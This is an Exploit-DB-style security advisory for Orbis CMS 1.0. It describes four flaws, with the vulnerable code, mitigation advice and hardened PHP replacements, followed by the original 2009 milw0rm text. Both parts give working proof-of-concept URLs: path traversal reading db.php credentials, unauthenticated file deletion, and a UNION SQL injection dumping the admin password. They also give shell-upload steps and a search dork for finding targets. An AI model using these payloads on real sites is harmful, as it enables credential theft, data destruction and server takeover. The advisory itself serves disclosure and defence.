Vendor: Orbis CMS
By: SirGod
CVSS: 7.5 (HIGH)
Vulnerabilities: Arbitrary File Download, Arbitrary File Delete, SQL Injection, Arbitrary Shell Upload
CWE: 89 (SQL Injection), 264 (Permissions, Privileges, and Access Controls), 564 (SQL Injection: Hibernate)
Product Name: Orbis CMS
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: 89, 264, 564
CPE: a:orbis_cms:orbis_cms:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Published: 2009-07-30 (milw0rm)

Orbis CMS 1.0 (AFD/ADF/ASU/SQL) Multiple Remote Vulnerabilities

Orbis CMS 1.0 ships four issues in its admin file manager and page editor, all reachable over HTTP. Two of them need no authentication at all, which matters because the unauthenticated file download can be used to read the database configuration and the admin area is where the other two live.

 - Arbitrary File Download (no login required). admin/fileman_file_download.php sets a forced-download header and then calls readfile($_GET['fn']) on the raw parameter, so any file the web server process can read is served. The vulnerable code is: header('Content-Type: application/force-download'); header('Content-Disposition: attachment; filename="'.basename($_GET['fn']).'"'); readfile($_GET['fn']); basename() only affects the suggested download name, not the path that is read. PoCs: http://127.0.0.1/[path]/admin/fileman_file_download.php?fn=../../../../../../../boot.ini (traversal out of the web root) and http://127.0.0.1/[path]/admin/fileman_file_download.php?fn=includes/config/db.php (the database credentials).

 - Arbitrary File Delete (no login required). admin/fileman_file_delete.php does $filename = $_GET['fn']; unlink($filename) or die("Couldn't delete ".$filename.". Please contact your web designer."); with no path restriction, so any file the web server process may write to can be removed. PoC: http://127.0.0.1/[path]/admin/fileman_file_delete.php?fn=../uploads/example.jpg

 - SQL Injection (login required). admin/editor.php passes $_GET['s'] to getSectionPage(), which concatenates it unquoted into mysql_query('SELECT * FROM content WHERE id='.$id.'', $db). Because the value is numeric context, no quote is needed to break out. PoC: http://127.0.0.1/[path]/admin/editor.php?s=null+union+all+select+1,2,3,4,5,concat_ws(0x3a,username,password)+from+security+where+user_id=1--&t=1

 - Arbitrary Shell Upload (login required). The file manager at admin/fileman.php accepts a .php upload without type restriction and stores it under uploads/, where the web server executes it: http://127.0.0.1/[path]/uploads/shell.php

Mitigation:

Resolve every user-supplied file name against a fixed base directory (realpath() plus a prefix check) and refuse anything that escapes it, in both the download and the delete handler; both handlers must also require an authenticated admin session, and the delete action should not be a bare GET. Use parameterized queries (or at minimum an integer cast) for the id passed to getSectionPage(). For uploads, allowlist extensions and MIME types, store files under server-generated names, and disable script execution in uploads/. Until a patch exists, restrict access to the admin/ directory at the web server level.
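The following is an added example, not Orbis CMS code and not part of the original advisory. It shows what hardened versions of the four handlers quoted below look like in PHP. The table and column names (content, id), the $db mysqli connection, the $_SESSION['admin'] flag, the CSRF token field and the uploads directory path are assumptions made for illustration; the original code uses the legacy mysql_* API and has no session check at all.

```php
<?php
// Added example (not Orbis CMS code): hardened replacements for the handlers
// named in the advisory. Table/column names, $db, the session flag and the
// CSRF field are assumptions.

// Resolve a user-supplied relative path under $baseDir and refuse anything that
// escapes it. realpath() collapses ../ and symlinks, so ../../../../boot.ini
// and includes/config/db.php are both rejected unless they exist under the base.
function resolveInside(string $baseDir, string $userPath): ?string
{
    $base = realpath($baseDir);
    if ($base === false || $userPath === '') {
        return null;
    }
    // Absolute paths, drive letters, NUL bytes and backslashes are rejected
    // outright (Windows treats "\" as a separator, realpath() on Linux does not).
    if ($userPath[0] === '/' || preg_match('/^[A-Za-z]:/', $userPath)
        || strpbrk($userPath, "\0\\") !== false) {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $userPath);
    if ($candidate === false) {
        return null; // nonexistent target
    }
    // Compare with a trailing separator so /srv/uploads_evil is not taken for a
    // child of /srv/uploads.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return is_file($candidate) ? $candidate : null;
}

function requireAdminSession(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['admin'])) {
        http_response_code(401);
        exit('Login required');
    }
}

// fileman_file_download.php (hardened): serve only files inside uploads/.
function downloadHandler(string $uploadsDir, array $get): void
{
    requireAdminSession();
    $path = resolveInside($uploadsDir, (string) ($get['fn'] ?? ''));
    if ($path === null) {
        http_response_code(404);
        exit('No such file');
    }
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . rawurlencode(basename($path)) . '"');
    readfile($path);
}

// fileman_file_delete.php (hardened): same confinement plus a CSRF token, since
// a GET that deletes files is trivially triggered cross-site.
function deleteHandler(string $uploadsDir, array $post, array $session): bool
{
    requireAdminSession();
    $token = (string) ($post['csrf'] ?? '');
    if ($token === '' || !hash_equals((string) ($session['csrf'] ?? ''), $token)) {
        http_response_code(403);
        exit('Bad CSRF token');
    }
    $path = resolveInside($uploadsDir, (string) ($post['fn'] ?? ''));
    return $path !== null && unlink($path);
}

// getSectionPage() (hardened): integer-only id bound through a prepared
// statement, so s=null+union+all+select+... is no longer a query fragment.
function getSectionPage(mysqli $db, $id): ?array
{
    if (!ctype_digit((string) $id)) {
        return null;
    }
    $stmt = $db->prepare('SELECT * FROM content WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// fileman.php upload (hardened): extension and MIME allowlist, server-generated
// name, so shell.php cannot land in uploads/ under a .php extension.
function uploadHandler(string $uploadsDir, array $file): ?string
{
    requireAdminSession();
    $allowed = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif', 'pdf' => 'application/pdf'];
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset($allowed[$ext]) || $allowed[$ext] !== $mime) {
        return null;
    }
    $dest = realpath($uploadsDir) . DIRECTORY_SEPARATOR . bin2hex(random_bytes(16)) . '.' . $ext;
    return move_uploaded_file($file['tmp_name'], $dest) ? $dest : null;
}
```

The prefix check in resolveInside() is the part people get wrong: checking only that the resolved path starts with the base string, without the trailing separator, lets a sibling directory whose name shares the prefix through. Pair the upload allowlist with a web server rule that disables PHP execution under uploads/, so a mistake in the allowlist does not immediately become remote code execution.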

Exploit-DB raw data:

################################################################################################################################################
[+] Orbis CMS 1.0 (AFD/ADF/ASU/SQL) Multiple Remote Vulnerabilities
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
################################################################################################################################################

[+] Dork : Powered by Orbis CMS

[+] Download script : http://www.novo-ws.com/orbis-cms/download.shtml

[+]>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Arbitrary File Download <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<[+]

 - No login required.

 - Vulnerable code in fileman_file_download.php

-----------------------------------------------------------------------------------
header('Content-Type: application/force-download');
header('Content-Disposition: attachment; filename="'.basename($_GET['fn']).'"');
readfile($_GET['fn']);
-----------------------------------------------------------------------------------

 - PoC's

    http://127.0.0.1/[path]/admin/fileman_file_download.php?fn=../../../../../../../boot.ini

    http://127.0.0.1/[path]/admin/fileman_file_download.php?fn=includes/config/db.php


[+]>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Arbitrary Delete File <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<[+]

 - No login required.

 - Vulnerable code in fileman_file_delete.php

-----------------------------------------------------------------------------------------------
 $filename = $_GET['fn'];

 unlink($filename) or die("Couldn't delete ".$filename.". Please contact your web designer.");
-----------------------------------------------------------------------------------------------

 - PoC

     http://127.0.0.1/[path]/admin/fileman_file_delete.php?fn=../uploads/example.jpg

[+]>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> SQL Injection <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<[+]

 - Login required.

 - Code from editor.php

---------------------------------------------
<?php require("includes/functions.php"); ?>
getSectionPage($_GET['s']);
---------------------------------------------

 - Vulnerable code in includes/functions.php

--------------------------------------------------------------------
function getSectionPage($id) {

 if(isset($id)) {
  require($_SESSION['inc_dir']."config/db.php");
  $sc=mysql_query('SELECT * FROM content WHERE id='.$id.'', $db);
--------------------------------------------------------------------

 - PoC

    http://127.0.0.1/[path]/admin/editor.php?s=null+union+all+select+1,2,3,4,5,concat_ws(0x3a,username,password)+from+security+where+user_id=1--&t=1


[+]>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Arbitrary Shell Upload <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<[+]

 - Login required.


 1) Go to

      http://127.0.0.1/[path]/admin/fileman.php

 2) Select your shell and upload it

      shell.php

 3) You will find your shell here

      http://127.0.0.1/[path]/uploads/shell.php

################################################################################################################################################

# milw0rm.com [2009-07-30]